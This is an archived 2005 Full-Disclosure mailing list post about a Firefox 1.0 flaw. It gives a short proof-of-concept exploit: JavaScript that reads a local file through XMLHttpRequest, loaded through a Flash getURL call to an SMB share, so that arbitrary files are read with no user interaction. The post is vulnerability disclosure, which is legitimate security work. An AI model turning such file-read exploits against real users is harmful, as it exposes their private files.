lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sat, 12 Feb 2005 15:25:30 +0100
From: Jelmer Kuperus <jkuperus@...net.nl>
To: mikx <mikx@...x.de>
Cc: NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM, bugtraq@...urityfocus.com,
        full-disclosure@...ts.netsys.com
Subject: Re: Fireflashing [Firefox 1.0]


I took a quick 5 minute look at this, and it looks like you can read 
arbitrary files with this without requiring any kind of user interaction.

Just create a file called whatever.html on a windows SMB share with this 
content

--snip--

<script language="javascript">
    var oXML=new XMLHttpRequest();
    oXML.open("GET","file:///C:/jelmer.txt",false);
    oXML.send(null);
    alert(oXML.responseText);
</script>

--snip--

Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
(I just created an empty flash file with a single action that contained 
the following line of actionscript : getURL 
("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
and presto it will display the contents of c:\jelmer.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ